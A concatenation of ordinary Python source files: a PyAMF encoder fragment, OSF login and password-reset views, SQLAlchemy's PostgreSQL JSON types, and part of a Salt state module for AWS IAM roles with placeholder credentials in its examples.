return self.writeString
elif t is bool:
return self.writeBoolean
elif t is float:
return self.writeNumber
elif t in python.int_types:
return self.writeNumber
elif t in (list, tuple):
return self.writeList
elif t is types.GeneratorType: # flake8: noqa
return self.writeGenerator
elif t is pyamf.UndefinedType:
return self.writeUndefined
elif t in (datetime.date, datetime.datetime, datetime.time):
return self.writeDate
elif xml.is_xml(data):
return self.writeXML
# check for any overridden types
for type_, func in pyamf.TYPE_MAP.iteritems():
try:
if isinstance(data, type_):
return _CustomTypeFunc(self, func)
except TypeError:
if python.callable(type_) and type_(data):
return _CustomTypeFunc(self, func)
if isinstance(data, (list, tuple)):
return self.writeSequence
# now try some types that won't encode
if t in python.class_types:
# can't encode classes
return None
elif isinstance(data, python.func_types):
# can't encode code objects
return None
elif isinstance(t, types.ModuleType):
# cannot encode module objects
return None
# well, we tried ..
return self.writeObject
def writeElement(self, data):
"""
Encodes C{data} to AMF. If the data is not able to be matched to an AMF
type, then L{pyamf.EncodeError} will be raised.
"""
key = type(data)
func = None
try:
func = self._func_cache[key]
except KeyError:
func = self.getTypeFunc(data)
if func is None:
raise pyamf.EncodeError('Unable to encode %r (type %r)' % (
data, key))
self._func_cache[key] = func
func(data)
def send(self, element):
self.bucket.append(element)
def next(self):
try:
element = self.bucket.pop(0)
except IndexError:
raise StopIteration
start_pos = self.stream.tell()
self.writeElement(element)
end_pos = self.stream.tell()
self.stream.seek(start_pos)
return self.stream.read(end_pos - start_pos)
def __iter__(self):
return self
|
|
# -*- coding: utf-8 -*-
import datetime
import furl
import httplib as http
import markupsafe
from flask import request
from modularodm import Q
from modularodm.exceptions import NoResultsFound
from modularodm.exceptions import ValidationValueError
from framework import forms, status
from framework import auth as framework_auth
from framework.auth import exceptions
from framework.auth import cas, campaigns
from framework.auth import logout as osf_logout
from framework.auth import get_user
from framework.auth.exceptions import DuplicateEmailError, ExpiredTokenError, InvalidTokenError
from framework.auth.core import generate_verification_key
from framework.auth.decorators import collect_auth, must_be_logged_in
from framework.auth.forms import ResendConfirmationForm, ResetPasswordForm, ForgotPasswordForm
from framework.exceptions import HTTPError
from framework.flask import redirect # VOL-aware redirect
from framework.sessions.utils import remove_sessions_for_user
from website import settings, mails, language
from website.models import User
from website.util import web_url_for
from website.util.sanitize import strip_html
from website.util.time import throttle_period_expired
@collect_auth
def reset_password_get(auth, verification_key=None, **kwargs):
"""
View for user to land on the reset password page.
HTTp Method: GET
:raises: HTTPError(http.BAD_REQUEST) if verification_key is invalid
"""
# If user is already logged in, log user out
if auth.logged_in:
return auth_logout(redirect_url=request.url)
# Check if request bears a valid verification_key
user_obj = get_user(verification_key=verification_key)
if not user_obj:
error_data = {
'message_short': 'Invalid url.',
'message_long': 'The verification key in the URL is invalid or has expired.'
}
raise HTTPError(400, data=error_data)
return {
'verification_key': verification_key,
}
@collect_auth
def reset_password_post(auth, verification_key=None, **kwargs):
"""
View for user to submit reset password form.
HTTP Method: POST
:raises: HTTPError(http.BAD_REQUEST) if verification_key is invalid
"""
# If user is already logged in, log user out
if auth.logged_in:
return auth_logout(redirect_url=request.url)
form = ResetPasswordForm(request.form)
# Check if request bears a valid verification_key
user_obj = get_user(verification_key=verification_key)
if not user_obj:
error_data = {
'message_short': 'Invalid url.',
'message_long': 'The verification key in the URL is invalid or has expired.'
}
raise HTTPError(400, data=error_data)
if form.validate():
# new random verification key, allows CAS to authenticate the user w/o password, one-time only.
# this overwrite also invalidates the verification key generated by forgot_password_post
user_obj.verification_key = generate_verification_key()
user_obj.set_password(form.password.data)
user_obj.save()
status.push_status_message('Password reset', kind='success', trust=False)
# redirect to CAS and authenticate the user with the one-time verification key.
return redirect(cas.get_login_url(
web_url_for('user_account', _absolute=True),
username=user_obj.username,
verification_key=user_obj.verification_key
))
else:
forms.push_errors_to_status(form.errors)
# Don't go anywhere
return {
'verification_key': verification_key
}
@collect_auth
def forgot_password_get(auth, **kwargs):
"""
View to user to land on forgot password page.
HTTP Method: GET
"""
# If user is already logged in, redirect to dashboard page.
if auth.logged_in:
return redirect(web_url_for('dashboard'))
return {}
@collect_auth
def forgot_password_post(auth, **kwargs):
"""
View for user to submit forgot password form.
HTTP Method: POST
"""
# If user is already logged in, redirect to dashboard page.
if auth.logged_in:
return redirect(web_url_for('dashboard'))
form = ForgotPasswordForm(request.form, prefix='forgot_password')
if form.validate():
email = form.email.data
status_message = ('If there is an OSF account associated with {0}, an email with instructions on how to '
'reset the OSF password has been sent to {0}. If you do not receive an email and believe '
'you should have, please contact OSF Support. ').format(email)
# check if the user exists
user_obj = get_user(email=email)
if user_obj:
# check forgot_password rate limit
if throttle_period_expired(user_obj.email_last_sent, settings.SEND_EMAIL_THROTTLE):
# new random verification key, allows OSF to check whether the reset_password request is valid,
# this verification key is used twice, one for GET reset_password and one for POST reset_password
# and it will be destroyed when POST reset_password succeeds
user_obj.verification_key = generate_verification_key()
user_obj.email_last_sent = datetime.datetime.utcnow()
user_obj.save()
reset_link = furl.urljoin(
settings.DOMAIN,
web_url_for(
'reset_password_get',
verification_key=user_obj.verification_key
)
)
mails.send_mail(
to_addr=email,
mail=mails.FORGOT_PASSWORD,
reset_link=reset_link
)
status.push_status_message(status_message, kind='success', trust=False)
else:
status.push_status_message('You have recently requested to change your password. Please wait a '
'little while before trying again.', kind='error', trust=False)
else:
status.push_status_message(status_message, kind='success', trust=False)
else:
forms.push_errors_to_status(form.errors)
# Don't go anywhere
return {}
@collect_auth
def auth_login(auth, **kwargs):
"""
This view serves as the entry point for OSF login and campaign login.
HTTP Method: GET
GET '/login/' without any query parameter:
redirect to CAS login page with dashboard as target service
GET '/login/?logout=true
log user out and redirect to CAS login page with redirect_url or next_url as target service
GET '/login/?campaign=instituion:
if user is logged in, redirect to 'dashboard'
show institution login
GET '/login/?campaign=prereg:
if user is logged in, redirect to prereg home page
else show sign up page and notify user to sign in, set next to prereg home page
GET '/login/?next=next_url:
if user is logged in, redirect to next_url
else redirect to CAS login page with next_url as target service
"""
campaign = request.args.get('campaign')
next_url = request.args.get('next')
log_out = request.args.get('logout')
must_login_warning = True
if not campaign and not next_url and not log_out:
if auth.logged_in:
return redirect(web_url_for('dashboard'))
return redirect(cas.get_login_url(web_url_for('dashboard', _absolute=True)))
if campaign:
next_url = campaigns.campaign_url_for(campaign)
if not next_url:
next_url = request.args.get('redirect_url')
must_login_warning = False
if next_url:
# Only allow redirects which are relative root or full domain, disallows external redirects.
if not (next_url[0] == '/'
or next_url.startswith(settings.DOMAIN)
or next_url.startswith(settings.CAS_SERVER_URL)
or next_url.startswith(settings.MFR_SERVER_URL)):
raise HTTPError(http.InvalidURL)
if auth.logged_in:
if not log_out:
if next_url:
return redirect(next_url)
return redirect('dashboard')
# redirect user to CAS for logout, return here w/o authentication
return auth_logout(redirect_url=request.url)
status_message = request.args.get('status', '')
if status_message == 'expired':
status.push_status_message('The private link you used is expired.', trust=False)
status.push_status_message('The private link you used is expired. Please <a href="/settings/account/">'
'resend email.</a>', trust=False)
if next_url and must_login_warning:
status.push_status_message(language.MUST_LOGIN, trust=False)
# set login_url to form action, upon successful authentication specifically w/o logout=True,
# allows for next to be followed or a redirect to the dashboard.
redirect_url = web_url_for('auth_login', next=next_url, _absolute=True)
data = {}
if campaign and campaign in campaigns.CAMPAIGNS:
if (campaign == 'institution' and settings.ENABLE_INSTITUTIONS) or campaign != 'institution':
data['campaign'] = campaign
data['login_url'] = cas.get_login_url(redirect_url)
data['institution_redirect'] = cas.get_institution_target(redirect_url)
data['redirect_url'] = next_url
data['sign_up'] = request.args.get('sign_up', False)
data['existing_user'] = request.args.get('existing_user', None)
return data, http.OK
def auth_logout(redirect_url=None, **kwargs):
"""
Log out, delete current session, delete CAS cookie and delete OSF cookie.
HTTP Method: GET
:param redirect_url: url to redirect user after logout, default is 'goodbye'
:return:
"""
redirect_url = redirect_url or request.args.get('redirect_url') or web_url_for('goodbye', _absolute=True)
# OSF log out, remove current OSF session
osf_logout()
# set redirection to CAS log out (or log in if 'reauth' is present)
if 'reauth' in request.args:
cas_endpoint = cas.get_login_url(redirect_url)
else:
cas_endpoint = cas.get_logout_url(redirect_url)
resp = redirect(cas_endpoint)
# delete OSF cookie
resp.delete_cookie(settings.COOKIE_NAME, domain=settings.OSF_COOKIE_DOMAIN)
return resp
def auth_email_logout(token, user):
"""
When a user is adding an email or merging an account, add the email to the user and log them out.
"""
redirect_url = cas.get_logout_url(service_url=cas.get_login_url(service_url=web_url_for('index', _absolute=True)))
try:
unconfirmed_email = user.get_unconfirmed_email_for_token(token)
except InvalidTokenError:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': 'Bad token',
'message_long': 'The provided token is invalid.'
})
except ExpiredTokenError:
status.push_status_message('The private link you used is expired.')
raise HTTPError(http.BAD_REQUEST, data={
'message_short': 'Expired link',
'message_long': 'The private link you used is expired.'
})
try:
user_merge = User.find_one(Q('emails', 'eq', unconfirmed_email))
except NoResultsFound:
user_merge = False
if user_merge:
remove_sessions_for_user(user_merge)
user.email_verifications[token]['confirmed'] = True
user.save()
remove_sessions_for_user(user)
resp = redirect(redirect_url)
resp.delete_cookie(settings.COOKIE_NAME, domain=settings.OSF_COOKIE_DOMAIN)
return resp
@collect_auth
def confirm_email_get(token, auth=None, **kwargs):
"""
View for email confirmation links. Authenticates and redirects to user settings page if confirmation is successful,
otherwise shows an "Expired Link" error.
HTTP Method: GET
"""
user = User.load(kwargs['uid'])
is_merge = 'confirm_merge' in request.args
is_initial_confirmation = not user.date_confirmed
log_out = request.args.get('logout', None)
if user is None:
raise HTTPError(http.NOT_FOUND)
# if the user is merging or adding an email (they already are an osf user)
if log_out:
return auth_email_logout(token, user)
if auth and auth.user and (auth.user._id == user._id or auth.user._id == user.merged_by._id):
if not is_merge:
# determine if the user registered through a campaign
campaign = campaigns.campaign_for_user(user)
if campaign:
return redirect(campaigns.campaign_url_for(campaign))
# go to home page with push notification
if len(auth.user.emails) == 1 and len(auth.user.email_verifications) == 0:
status.push_status_message(language.WELCOME_MESSAGE, kind='default', jumbotron=True, trust=True)
if token in auth.user.email_verifications:
status.push_status_message(language.CONFIRM_ALTERNATE_EMAIL_ERROR, kind='danger', trust=True)
return redirect(web_url_for('index'))
status.push_status_message(language.MERGE_COMPLETE, kind='success', trust=False)
return redirect(web_url_for('user_account'))
try:
user.confirm_email(token, merge=is_merge)
except exceptions.EmailConfirmTokenError as e:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': e.message_short,
'message_long': e.message_long
})
if is_initial_confirmation:
user.date_last_login = datetime.datetime.utcnow()
user.save()
# send out our welcome message
mails.send_mail(
to_addr=user.username,
mail=mails.WELCOME,
mimetype='html',
user=user
)
# new random verification key, allows CAS to authenticate the user w/o password one-time only.
user.verification_key = generate_verification_key()
user.save()
# redirect to CAS and authenticate the user with a verification key.
return redirect(cas.get_login_url(
request.url,
username=user.username,
verification_key=user.verification_key
))
@must_be_logged_in
def unconfirmed_email_remove(auth=None):
"""
Called at login if user cancels their merge or email add.
HTTP Method: DELETE
"""
user = auth.user
json_body = request.get_json()
try:
given_token = json_body['token']
except KeyError:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': 'Missing token',
'message_long': 'Must provide a token'
})
user.clean_email_verifications(given_token=given_token)
user.save()
return {
'status': 'success',
'removed_email': json_body['address']
}, 200
@must_be_logged_in
def unconfirmed_email_add(auth=None):
"""
Called at login if user confirms their merge or email add.
HTTP Method: PUT
"""
user = auth.user
json_body = request.get_json()
try:
token = json_body['token']
except KeyError:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': 'Missing token',
'message_long': 'Must provide a token'
})
try:
user.confirm_email(token, merge=True)
except exceptions.InvalidTokenError:
raise InvalidTokenError(http.BAD_REQUEST, data={
'message_short': 'Invalid user token',
'message_long': 'The user token is invalid'
})
except exceptions.EmailConfirmTokenError as e:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': e.message_short,
'message_long': e.message_long
})
user.save()
return {
'status': 'success',
'removed_email': json_body['address']
}, 200
def send_confirm_email(user, email):
"""
Sends a confirmation email to `user` to a given email.
:raises: KeyError if user does not have a confirmation token for the given email.
"""
confirmation_url = user.get_confirmation_url(
email,
external=True,
force=True,
)
try:
merge_target = User.find_one(Q('emails', 'eq', email))
except NoResultsFound:
merge_target = None
campaign = campaigns.campaign_for_user(user)
# Choose the appropriate email template to use and add existing_user flag if a merge or adding an email.
if merge_target: # merge account
mail_template = mails.CONFIRM_MERGE
confirmation_url = '{}?logout=1'.format(confirmation_url)
elif user.is_active: # add email
mail_template = mails.CONFIRM_EMAIL
confirmation_url = '{}?logout=1'.format(confirmation_url)
elif campaign: # campaign
mail_template = campaigns.email_template_for_campaign(campaign)
else: # account creation
mail_template = mails.INITIAL_CONFIRM_EMAIL
mails.send_mail(
email,
mail_template,
'plain',
user=user,
confirmation_url=confirmation_url,
email=email,
merge_target=merge_target,
)
@collect_auth
def auth_register(auth, **kwargs):
"""
View for sign-up page.
HTTP Method: GET
"""
# If user is already logged in, redirect to dashboard page.
if auth.logged_in:
return redirect(web_url_for('dashboard'))
return {}, http.OK
def register_user(**kwargs):
"""
Register new user account.
HTTP Method: POST
:param-json str email1:
:param-json str email2:
:param-json str password:
:param-json str fullName:
:param-json str campaign:
:raises: HTTPError(http.BAD_REQUEST) if validation fails or user already exists
"""
# Verify email address match
json_data = request.get_json()
if str(json_data['email1']).lower() != str(json_data['email2']).lower():
raise HTTPError(
http.BAD_REQUEST,
data=dict(message_long='Email addresses must match.')
)
try:
full_name = request.json['fullName']
full_name = strip_html(full_name)
campaign = json_data.get('campaign')
if campaign and campaign not in campaigns.CAMPAIGNS:
campaign = None
user = framework_auth.register_unconfirmed(
request.json['email1'],
request.json['password'],
full_name,
campaign=campaign,
)
framework_auth.signals.user_registered.send(user)
except (ValidationValueError, DuplicateEmailError):
raise HTTPError(
http.BAD_REQUEST,
data=dict(
message_long=language.ALREADY_REGISTERED.format(
email=markupsafe.escape(request.json['email1'])
)
)
)
if settings.CONFIRM_REGISTRATIONS_BY_EMAIL:
send_confirm_email(user, email=user.username)
message = language.REGISTRATION_SUCCESS.format(email=user.username)
return {'message': message}
else:
return {'message': 'You may now log in.'}
@collect_auth
def resend_confirmation_get(auth):
"""
View for user to land on resend confirmation page.
HTTP Method: GET
"""
# If user is already logged in, log user out
if auth.logged_in:
return auth_logout(redirect_url=request.url)
form = ResendConfirmationForm(request.form)
return {
'form': form,
}
@collect_auth
def resend_confirmation_post(auth):
"""
View for user to submit resend confirmation form.
HTTP Method: POST
"""
# If user is already logged in, log user out
if auth.logged_in:
return auth_logout(redirect_url=request.url)
form = ResendConfirmationForm(request.form)
if form.validate():
clean_email = form.email.data
user = get_user(email=clean_email)
status_message = ('If there is an OSF account associated with this unconfirmed email {0}, '
'a confirmation email has been resent to it. If you do not receive an email and believe '
'you should have, please contact OSF Support.').format(clean_email)
kind = 'success'
if user:
try:
send_confirm_email(user, clean_email)
except KeyError:
# already confirmed, redirect to dashboard
status_message = 'This email {0} has already been confirmed.'.format(clean_email)
kind = 'warning'
status.push_status_message(status_message, kind=kind, trust=False)
else:
forms.push_errors_to_status(form.errors)
# Don't go anywhere
return {'form': form}
|
|
# postgresql/json.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from __future__ import absolute_import
import json
import collections
from .base import ischema_names, colspecs
from ... import types as sqltypes
from ...sql import operators
from ...sql import elements
from ... import util
__all__ = ('JSON', 'JSONB')
ASTEXT = operators.custom_op(
"->>", precedence=15, natural_self_precedent=True,
)
JSONPATH_ASTEXT = operators.custom_op(
"#>>", precedence=15, natural_self_precedent=True,
)
HAS_KEY = operators.custom_op(
"?", precedence=15, natural_self_precedent=True
)
HAS_ALL = operators.custom_op(
"?&", precedence=15, natural_self_precedent=True
)
HAS_ANY = operators.custom_op(
"?|", precedence=15, natural_self_precedent=True
)
CONTAINS = operators.custom_op(
"@>", precedence=15, natural_self_precedent=True
)
CONTAINED_BY = operators.custom_op(
"<@", precedence=15, natural_self_precedent=True
)
class JSONPathType(sqltypes.JSON.JSONPathType):
def bind_processor(self, dialect):
def process(value):
assert isinstance(value, collections.Sequence)
tokens = [util.text_type(elem) for elem in value]
return "{%s}" % (", ".join(tokens))
return process
colspecs[sqltypes.JSON.JSONPathType] = JSONPathType
class JSON(sqltypes.JSON):
"""Represent the Postgresql JSON type.
This type is a specialization of the Core-level :class:`.types.JSON`
type. Be sure to read the documentation for :class:`.types.JSON` for
important tips regarding treatment of NULL values and ORM use.
.. versionchanged:: 1.1 :class:`.postgresql.JSON` is now a Postgresql-
specific specialization of the new :class:`.types.JSON` type.
The operators provided by the Postgresql version of :class:`.JSON`
include:
* Index operations (the ``->`` operator)::
data_table.c.data['some key']
data_table.c.data[5]
* Index operations returning text (the ``->>`` operator)::
data_table.c.data['some key'].astext == 'some value'
* Index operations with CAST
(equivalent to ``CAST(col ->> ['some key'] AS <type>)``)::
data_table.c.data['some key'].astext.cast(Integer) == 5
* Path index operations (the ``#>`` operator)::
data_table.c.data[('key_1', 'key_2', 5, ..., 'key_n')]
* Path index operations returning text (the ``#>>`` operator)::
data_table.c.data[('key_1', 'key_2', 5, ..., 'key_n')].astext == \
'some value'
.. versionchanged:: 1.1 The :meth:`.ColumnElement.cast` operator on
JSON objects now requires that the :attr:`.JSON.Comparator.astext`
modifier be called explicitly, if the cast works only from a textual
string.
Index operations return an expression object whose type defaults to
:class:`.JSON` by default, so that further JSON-oriented instructions
may be called upon the result type.
Custom serializers and deserializers are specified at the dialect level,
that is using :func:`.create_engine`. The reason for this is that when
using psycopg2, the DBAPI only allows serializers at the per-cursor
or per-connection level. E.g.::
engine = create_engine("postgresql://scott:tiger@localhost/test",
json_serializer=my_serialize_fn,
json_deserializer=my_deserialize_fn
)
When using the psycopg2 dialect, the json_deserializer is registered
against the database using ``psycopg2.extras.register_default_json``.
.. seealso::
:class:`.types.JSON` - Core level JSON type
:class:`.JSONB`
"""
astext_type = sqltypes.Text()
def __init__(self, none_as_null=False, astext_type=None):
"""Construct a :class:`.JSON` type.
:param none_as_null: if True, persist the value ``None`` as a
SQL NULL value, not the JSON encoding of ``null``. Note that
when this flag is False, the :func:`.null` construct can still
be used to persist a NULL value::
from sqlalchemy import null
conn.execute(table.insert(), data=null())
.. versionchanged:: 0.9.8 - Added ``none_as_null``, and :func:`.null`
is now supported in order to persist a NULL value.
.. seealso::
:attr:`.JSON.NULL`
:param astext_type: the type to use for the
:attr:`.JSON.Comparator.astext`
accessor on indexed attributes. Defaults to :class:`.types.Text`.
.. versionadded:: 1.1
"""
super(JSON, self).__init__(none_as_null=none_as_null)
if astext_type is not None:
self.astext_type = astext_type
class Comparator(sqltypes.JSON.Comparator):
"""Define comparison operations for :class:`.JSON`."""
@property
def astext(self):
"""On an indexed expression, use the "astext" (e.g. "->>")
conversion when rendered in SQL.
E.g.::
select([data_table.c.data['some key'].astext])
.. seealso::
:meth:`.ColumnElement.cast`
"""
if isinstance(self.expr.right.type, sqltypes.JSON.JSONPathType):
return self.expr.left.operate(
JSONPATH_ASTEXT,
self.expr.right, result_type=self.type.astext_type)
else:
return self.expr.left.operate(
ASTEXT, self.expr.right, result_type=self.type.astext_type)
comparator_factory = Comparator
colspecs[sqltypes.JSON] = JSON
ischema_names['json'] = JSON
class JSONB(JSON):
"""Represent the Postgresql JSONB type.
The :class:`.JSONB` type stores arbitrary JSONB format data, e.g.::
data_table = Table('data_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', JSONB)
)
with engine.connect() as conn:
conn.execute(
data_table.insert(),
data = {"key1": "value1", "key2": "value2"}
)
The :class:`.JSONB` type includes all operations provided by
:class:`.JSON`, including the same behaviors for indexing operations.
It also adds additional operators specific to JSONB, including
:meth:`.JSONB.Comparator.has_key`, :meth:`.JSONB.Comparator.has_all`,
:meth:`.JSONB.Comparator.has_any`, :meth:`.JSONB.Comparator.contains`,
and :meth:`.JSONB.Comparator.contained_by`.
Like the :class:`.JSON` type, the :class:`.JSONB` type does not detect
in-place changes when used with the ORM, unless the
:mod:`sqlalchemy.ext.mutable` extension is used.
Custom serializers and deserializers
are shared with the :class:`.JSON` class, using the ``json_serializer``
and ``json_deserializer`` keyword arguments. These must be specified
at the dialect level using :func:`.create_engine`. When using
psycopg2, the serializers are associated with the jsonb type using
``psycopg2.extras.register_default_jsonb`` on a per-connection basis,
in the same way that ``psycopg2.extras.register_default_json`` is used
to register these handlers with the json type.
.. versionadded:: 0.9.7
.. seealso::
:class:`.JSON`
"""
__visit_name__ = 'JSONB'
class Comparator(JSON.Comparator):
"""Define comparison operations for :class:`.JSON`."""
def has_key(self, other):
"""Boolean expression. Test for presence of a key. Note that the
key may be a SQLA expression.
"""
return self.operate(HAS_KEY, other, result_type=sqltypes.Boolean)
def has_all(self, other):
"""Boolean expression. Test for presence of all keys in jsonb
"""
return self.operate(HAS_ALL, other, result_type=sqltypes.Boolean)
def has_any(self, other):
"""Boolean expression. Test for presence of any key in jsonb
"""
return self.operate(HAS_ANY, other, result_type=sqltypes.Boolean)
def contains(self, other, **kwargs):
"""Boolean expression. Test if keys (or array) are a superset
of/contained the keys of the argument jsonb expression.
"""
return self.operate(CONTAINS, other, result_type=sqltypes.Boolean)
def contained_by(self, other):
"""Boolean expression. Test if keys are a proper subset of the
keys of the argument jsonb expression.
"""
return self.operate(
CONTAINED_BY, other, result_type=sqltypes.Boolean)
comparator_factory = Comparator
ischema_names['jsonb'] = JSONB
|
|
"""
Manage IAM roles
================
.. versionadded:: 2014.7.0
This module uses ``boto``, which can be installed via package, or pip.
This module accepts explicit IAM credentials but can also utilize
IAM roles assigned to the instance through Instance Profiles. Dynamic
credentials are then automatically obtained from AWS API and no further
configuration is necessary. More information available `here
<http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html>`_.
If IAM roles are not used you need to specify them either in a pillar file or
in the minion's config file:
.. code-block:: yaml
iam.keyid: GKTADJGHEIQSXMKKRBJ08H
iam.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
It's also possible to specify ``key``, ``keyid`` and ``region`` via a profile, either
passed in as a dict, or as a string to pull from pillars or minion config:
.. code-block:: yaml
myprofile:
keyid: GKTADJGHEIQSXMKKRBJ08H
key: askjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
region: us-east-1
Creating a role will automatically create an instance profile and associate it
with the role. This is the default behavior of the AWS console.
.. code-block:: yaml
myrole:
boto_iam_role.present:
- region: us-east-1
- key: GKTADJGHEIQSXMKKRBJ08H
- keyid: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
- policies_from_pillars:
- shared_iam_bootstrap_policy
- policies:
MySQSPolicy:
Statement:
- Action:
- sqs:*
Effect: Allow
Resource:
- arn:aws:sqs:*:*:*
Sid: MyPolicySQS1
MyS3Policy:
Statement:
- Action:
- s3:GetObject
Effect: Allow
Resource:
- arn:aws:s3:*:*:mybucket/*
# Using a credentials profile from pillars
myrole:
boto_iam_role.present:
- profile: myiamprofile
# Passing in a credentials profile
myrole:
boto_iam_role.present:
- profile:
key: GKTADJGHEIQSXMKKRBJ08H
keyid: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
region: us-east-1
If ``delete_policies: False`` is specified, existing policies that are not in
the given list of policies will not be deleted. This allows manual modifications
on the IAM role to be persistent. This functionality was added in 2015.8.0.
.. note::
When using the ``profile`` parameter and ``region`` is set outside of
the profile group, region is ignored and a default region will be used.
If ``region`` is missing from the ``profile`` data set, ``us-east-1``
will be used as the default region.
"""
import logging
import salt.utils.dictdiffer
import salt.utils.dictupdate as dictupdate
from salt.utils.odict import OrderedDict
log = logging.getLogger(__name__)
def __virtual__():
"""
Only load if boto is available.
"""
if "boto_iam.role_exists" in __salt__:
return "boto_iam_role"
return (False, "boto_iam module could not be loaded")
def present(
name,
policy_document=None,
policy_document_from_pillars=None,
path=None,
policies=None,
policies_from_pillars=None,
managed_policies=None,
create_instance_profile=True,
region=None,
key=None,
keyid=None,
profile=None,
delete_policies=True,
):
"""
Ensure the IAM role exists.
name
Name of the IAM role.
policy_document
The policy that grants an entity permission to assume the role.
(See https://boto.readthedocs.io/en/latest/ref/iam.html#boto.iam.connection.IAMConnection.create_role)
policy_document_from_pillars
A pillar key that contains a role policy document. The statements
defined here will be appended with the policy document statements
defined in the policy_document argument.
.. versionadded:: 2017.7.0
path
The path to the role/instance profile.
(See https://boto.readthedocs.io/en/latest/ref/iam.html#boto.iam.connection.IAMConnection.create_role)
policies
A dict of IAM role policies.
policies_from_pillars
A list of pillars that contain role policy dicts. Policies in the
pillars will be merged in the order defined in the list and key
conflicts will be handled by later defined keys overriding earlier
defined keys. The policies defined here will be merged with the
policies defined in the policies argument. If keys conflict, the keys
in the policies argument will override the keys defined in
policies_from_pillars.
managed_policies
A list of (AWS or Customer) managed policies to be attached to the role.
create_instance_profile
A boolean of whether or not to create an instance profile and associate
it with this role.
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string)
that contains a dict with region, key and keyid.
delete_policies
Deletes existing policies that are not in the given list of policies. Default
value is ``True``. If ``False`` is specified, existing policies will not be deleted
allowing manual modifications on the IAM role to be persistent.
.. versionadded:: 2015.8.0
"""
ret = {"name": name, "result": True, "comment": "", "changes": {}}
# Build up _policy_document
_policy_document = {}
if policy_document_from_pillars:
from_pillars = __salt__["pillar.get"](policy_document_from_pillars)
if from_pillars:
_policy_document["Version"] = from_pillars["Version"]
_policy_document.setdefault("Statement", [])
_policy_document["Statement"].extend(from_pillars["Statement"])
if policy_document:
_policy_document["Version"] = policy_document["Version"]
_policy_document.setdefault("Statement", [])
_policy_document["Statement"].extend(policy_document["Statement"])
_ret = _role_present(name, _policy_document, path, region, key, keyid, profile)
# Build up _policies
if not policies:
policies = {}
if not policies_from_pillars:
policies_from_pillars = []
if not managed_policies:
managed_policies = []
_policies = {}
for policy in policies_from_pillars:
_policy = __salt__["pillar.get"](policy)
_policies.update(_policy)
_policies.update(policies)
ret["changes"] = _ret["changes"]
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
if create_instance_profile:
_ret = _instance_profile_present(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _instance_profile_associated(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _policies_present(
name, _policies, region, key, keyid, profile, delete_policies
)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
_ret = _policies_attached(name, managed_policies, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
return ret
def _role_present(
name,
policy_document=None,
path=None,
region=None,
key=None,
keyid=None,
profile=None,
):
ret = {"result": True, "comment": "", "changes": {}}
role = __salt__["boto_iam.describe_role"](name, region, key, keyid, profile)
if not role:
if __opts__["test"]:
ret["comment"] = "IAM role {} is set to be created.".format(name)
ret["result"] = None
return ret
created = __salt__["boto_iam.create_role"](
name, policy_document, path, region, key, keyid, profile
)
if created:
ret["changes"]["old"] = {"role": None}
ret["changes"]["new"] = {"role": name}
ret["comment"] = "IAM role {} created.".format(name)
else:
ret["result"] = False
ret["comment"] = "Failed to create {} IAM role.".format(name)
else:
ret["comment"] = "{} role present.".format(name)
if not policy_document:
_policy_document = __salt__["boto_iam.build_policy"](
region, key, keyid, profile
)
else:
_policy_document = policy_document
if salt.utils.dictdiffer.deep_diff(
_sort_policy(role["assume_role_policy_document"]),
_sort_policy(_policy_document),
):
if __opts__["test"]:
msg = "Assume role policy document to be updated."
ret["comment"] = "{} {}".format(ret["comment"], msg)
ret["result"] = None
return ret
updated = __salt__["boto_iam.update_assume_role_policy"](
name, _policy_document, region, key, keyid, profile
)
if updated:
msg = "Assume role policy document updated."
ret["comment"] = "{} {}".format(ret["comment"], msg)
ret["changes"]["old"] = {
"policy_document": role["assume_role_policy_document"]
}
ret["changes"]["new"] = {"policy_document": _policy_document}
else:
ret["result"] = False
msg = "Failed to update assume role policy."
ret["comment"] = "{} {}".format(ret["comment"], msg)
return ret
def _instance_profile_present(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
exists = __salt__["boto_iam.instance_profile_exists"](
name, region, key, keyid, profile
)
if not exists:
if __opts__["test"]:
ret["comment"] = "Instance profile {} is set to be created.".format(name)
ret["result"] = None
return ret
created = __salt__["boto_iam.create_instance_profile"](
name, region, key, keyid, profile
)
if created:
ret["changes"]["old"] = {"instance_profile": None}
ret["changes"]["new"] = {"instance_profile": name}
ret["comment"] = "Instance profile {} created.".format(name)
else:
ret["result"] = False
ret["comment"] = "Failed to create {} instance profile.".format(name)
return ret
def _instance_profile_associated(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
is_associated = __salt__["boto_iam.profile_associated"](
name, name, region, key, keyid, profile
)
if not is_associated:
if __opts__["test"]:
ret["comment"] = "Instance profile {} is set to be associated.".format(name)
ret["result"] = None
return ret
